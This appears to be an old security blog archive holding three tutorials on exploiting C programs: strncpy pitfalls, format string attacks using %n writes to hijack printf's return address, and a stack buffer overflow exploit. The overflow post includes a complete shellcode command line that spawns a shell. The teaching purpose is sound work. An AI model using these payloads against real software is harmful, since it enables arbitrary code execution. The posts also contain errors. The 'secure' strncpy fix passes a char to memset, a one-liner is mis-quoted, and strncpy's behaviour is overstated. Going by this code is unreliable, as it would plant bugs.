Archive for the ‘Exploitation’ Category

strncpy – Is it really secure?

Posted: September 22, 2011 in Stack Smashing

Though there is a lot of information already available on the same, I would like to talk a bit about this. In many experts’ view, strncpy() just trades one type of bug for another. In a sense, this is true. A short and straight-forward answer would be “No!”, but let’s look at why it is so.

  • strcpy() copies data from the source onto the destination, until a NULL character is met in the source operand. It does not check bounds of the destination onto which it is copying data. So this can be used to overflow static buffers in memory, overwriting memory locations that ideally shouldn’t be overwritten.
  • strncpy() on the other hand, handles the problem with ease. It takes a third argument as the maximum number of characters that should be copied onto the destination string. This number is generally the size of the destination buffer. But then strncpy() does not append the destination string with a NULL character. Thus, if string handling functions were to use the destination buffer, they would have to blindly hope that the byte immediately after the destination buffer is a NULL character. In most cases, this is not true.

Thus if one were to use strncpy(), they would have to hope that the byte immediately after the destination buffer onto which they copy the string is a NULL character (0x0). This is not true in most of the cases, as static variables on the stack are allocated contiguously, enabling random access of data exceeding the bounds of the buffer. A classic example of such a case is one where a vulnerable strcpy() function call is made with the source string previously copied using a (supposedly safe) strncpy() function. This strcpy() function copies data till a NULL character is met, but this NULL character was never appended to the source string when the previous strncpy() function call was made. Thus there is a potential buffer overflow vulnerability. SmashTheStack’s IO has level6 which deals with this case specifically. I’ve also written a small writeup on hints regarding the same.

Another example is a strncpy() function followed by a strncat() function, which in some cases is vulnerable to a buffer overflow. SmashTheStack’s IO has level8 which deals with this case and I’ve also written a writeup on the same.

Well, what do we do then?

All we can do is to manually append a NULL character to a string once strncpy() call is done. In order to do this, we need the size of the buffer to be one more than the actual size of the string to be stored. A secure implementation would be:

#define STRINGSIZE 5

char buf [ STRINGSIZE + 1 ];

strncpy ( buf, “abcde”, STRINGSIZE );

memset ( buf [ STRINGSIZE ], 0x0, 1 );

For understanding this vulnerability, you first have a thorough understanding of the stack layout.

  • What is a format string?

From my understanding (quite naive), a format string is a string which determines the format of the rest of the arguments passed to a function. In the case of C language, functions such as printf(), scanf(), fprintf(), vsprintf() take format strings as argument.

Example: printf(“%d”,i);      => Here, ‘%d’ is a format string which determines the format of ‘i’ (in this case – integer).

  • What is a format string vulnerability?

A format string vulnerability is where an unsanitized input is passed to a function which is capable of taking a format string as argument. From a programmer’s perspective, this unsanitized string is assumed to be a normal string, but if given as a format string, can lead to examining values of the stack and much more.

  • What can be done by exploiting one?

By exploiting such a vulnerability, an attacker can dump the entire program’s stack, write into arbitrary memory locations and even execute custom written machine code.

Let’s take an example and proceed:

#include <stdio.h>

#include <string.h>

int main ( int argc, char **argv ) {

char buffer[1024];

if ( argc >= 2 ) {

strncpy ( buffer, argv[1], strlen(argv[1]) > 1024 ? 1024 : strlen(argv[1]) );

printf ( buffer );

}

return 0;

}

This program should ideally print the first command line argument (maximum length 1024) given to the program. One question we have to ask ourselves is:

  • Since the input given to the printf() function is unsanitized, what if we give a format string as argument?

Let’s analyze this a bit more. Let’s consider:

printf ( “%d”, i );

Here, you can see that there are two arguments to be passed to the printf function. Now, when printf takes the first argument and parses it, it sees “%d”. There, it knows that there is a second argument which must’ve been provided and that’s an integer i. So it takes the next argument (next 4 bytes below 1st argument) from the stack (which it assumes the calling function must’ve pushed) and prints it.

Let’s take the case:

printf ( buffer );        // Here, ‘buffer’ contains “%d”.

It’s clear from this that if ‘%d’ is present in buffer, printf tries to take the next argument from stack. Now, there isn’t any argument that would’ve been pushed by the calling function, and yet printf assumes that an argument should’ve been pushed and takes the next word from stack as the integer and prints it. Now, the value which is printed is some random value (mostly a local variable of the calling function). So, since we have the freedom to enter whatever format string we want in ‘buffer’, we have to ability to print the local variables of the calling function, and much more.

Let’s also learn about some possibilities in format strings:

  • “%p” – prints the value of the pointer provided as argument (essentially a 4 byte hex dump).
  • “%n” – stores the number of bytes written till now, in the pointer provided as argument.
  • “%Nd” – prints the integer provided as argument prefixed by ‘N’ empty spaces.

So given all this and a vulnerable printf() function:

  • We can dump the values of the stack by appropriate number of %p’s.
  • We can write the number of bytes written till now into an address provided as argument using ‘%n’.
  • We can use ‘%Nd’ to control the value written into the pointer.

Coming back to our example, we know that the argument passed to printf is the starting address of the character array ‘buffer’. The memory layout is:

Stack Layout of Format String

Stack Layout of Format String

Now, let’s see what we can put in ‘buffer’:

  • If ‘buffer’ = “abcd”, nothing new will happen and the function will just print ‘abcd’.
  • If ‘buffer’ = “%p”, then printf will see the next 4 bytes (part of buffer  itself) from the stack as the argument and print the value.
  • If ‘buffer’ = “%nAB”, then printf will consider the next argument (first 4 bytes of ‘buffer’) as a pointer to a variable and write the number of bytes printed till now (that’s zero), into the address pointed to by these 4 bytes. Essentially, it should give segmentation fault (SIGSEGV) as the value of the address to be written is “0x4241673e” (hex of ‘BAn%’ in little-endian) and that address is not accessible by this process.
  • If ‘buffer’ = “\x9c\xd8\xff\xbf%n”, then printf will consider the next argument as a pointer and try to write 4 into it (since \x9c\xd8\xff\xbf is 4 bytes). The next argument itself is 0xbfffd89c, which we assume in this case to be the address where the return address of printf is stored. If not, we try to debug the program, get the pointer to the return address of printf appropriately store that value. Hence, the program will again give a segmentation fault since after printf executes, it’s return address is 0x00000004 (overwritten by printf itself), and tries to execute instructions at that address, resulting in SIGSEGV.
  • If ‘buffer’ =
    • “\x01\x01\x01\x01\x9c\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9d\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9e\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9f\xd8\xff\xbf”+
    • “%10u%n%10u%n%10u%n%10u%n”

In this case, assuming that the return address is 4 btyes from 0xbfffd89c to 0xbfffd89f, printf will write 26 into the first byte of return address, 37 into the second byte, 48 into the third byte and 59 into the fourth byte. Thus the return address of printf this time is overwritten as 0x3b30251a. It’ll still result in a segmentation fault, but atleast we now know that we can write any arbitrary value into the return address of printf.

  • If we place some shellcode in the buffer after our format string and we know the starting address of the format string, then we can successfully execute our own code. Let’s assume that the format string starts at address 0xbfffd8a4. Now, the format string will end at 0xbfffd8a4 + 40 = 0xbfffd8cc and this is where our shellcode starts. Hence, we need to write this address 0xbfffd8cc as the return address of printf.
    • buffer =“\x01\x01\x01\x01\x9c\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9d\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9e\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9f\xd8\xff\xbf”+
    • “%175u%n%64u%n%217u%n%204u%n”+
    • “<shellcode>”

The above code will write the value ofbfffd8a4 into the return address of printf. 16 bytes were already written for the return address, so 175+16 = 191 (decimal of bf) will be written on the first byte of the return address. Subsequently, 191+64 = 255 (decimal of ‘ff’) will be written on the second byte of return address, and so on

Hence, with the above exploit, we’ll be able to execute any code we want using the format string.

How do we make our code secure?

Simple, don’t allow the user to be able to pass a format string to the function. A simple solution would be to write the format string yourself, and expect just the data from the user.

printf ( buffer );              —> INSECURE

printf ( “%s”, buffer );  —-> SECURE

One of the main objectives of writing this tutorial is to show people that exploiting a buffer overflow vulnerability is NO BIG DEAL. We’re dealing with a linux OS here, so take into considerations that some parts of the explanation will be linux specific. Now, to the point.

  • What is a buffer overflow vulnerability?

A buffer overflow vulnerability is one where a program disregards bounds checking while copying data onto a buffer present in memory. This allows data to overflow the buffer and be copied into random addresses, thus allowing a user to write arbitrary data into memory locations which ideally should not be overwritten.

  • What can be done by exploiting one?

In most cases, the user can execute arbitrary code on the host system. This highly depends on the user executing the program. If it’s root user, then voila – ANYTHING is possible! 😀

  • Is there any background knowledge needed for exploitation?

A good understanding of the memory layout during program execution along with a bit of patience and self motivation is necessary to exploit one.

Now, assuming that you’ve understood the basics of stack memory layout from the background info section, let’s move onto looking at a simple buffer overflow exploit.

Exploiting a buffer overflow

Let’s consider a sample program:

#include <stdio.h>

#include <string.h>

void print_argument ( char **argv ) {

/* This function is vulnerable to a buffer overflow attack */

char buffer[50];

strcpy ( buffer, argv[1] );

printf ( “Argument : %s\n”, buffer );

return;

}

int main ( int argc, char **argv ) {

if ( argc >= 2 ) {

print_argument ( argv );

}

return 0;

}

The above program prints the first command line argument provided to the program. Let’s examine why this program is vulnerable to a buffer overflow attack. A critical question that should be answered is:

  • What if we provide a command line argument whose length is greater than 50?

We know that the variable buffer of size 50 bytes is allocated on the stack. Below that lies the base pointer, and below that lies the return address of the main() function. The outline of stack layout is given below:

Stack Layout

Stack Layout

Now, if we provide more than 50 bytes as command line argument, strcpy() function tried to copy all the values of argv[1] onto buffer, thus overflowing the buffer and overwriting the values of the saved base pointer and the return address. In a x86 32 bit system, the word size is 4 bytes. Hence, if we provide 58 bytes, we’ll successfully overwrite the value of return address and base pointer.

When strcpy() finishes, it’ll try to pop out the base pointer (some random value overwritten) and store the return address in EIP. This return address is also overwritten by us, and hence we have control of where the processor must start executing the next instruction. Now, if we store some shell code (or machine code, which I’ll explain later) in the buffer, and overwrite the return address as the starting address of buffer, then the processor will start executing from the buffer as if it were instructions. VOILA, we can execute whatever we want! 😀

Now, let’s write an exploit to give us a shell when we execute this program. Don’t worry if you don’t understand the exploit, there’s a lot to be learnt about shell codes and how they work before you can actually go to write an exploit. In this case, let’s assume that the address where the variable ‘buffer’ starts is 0xbfffd89c.

$ gcc printargs.c -o printargs

$ ./printargs `python -c ‘print “\x90″*10+”\x6a\x31\x66\x58\xcd\x80\x66\x89″ + \xc3\x66\x89\xc1\x6a\x46\x66\x58” + “\xcd\x80\x31\xc9\xf7\xe1\x51\x68” + “\x2f\x2f\x73\x68\x68\x2f\x62\x69” + “\x6e\x89\xe3\xb0\x0b\xcd\x80” + “\x41″*5+”\x9c\xd8\xff\xbf”‘`

sh:~$

That’s it, you’ve got a shell! 🙂 It’s as simple as that folks, nothing more to it! 😀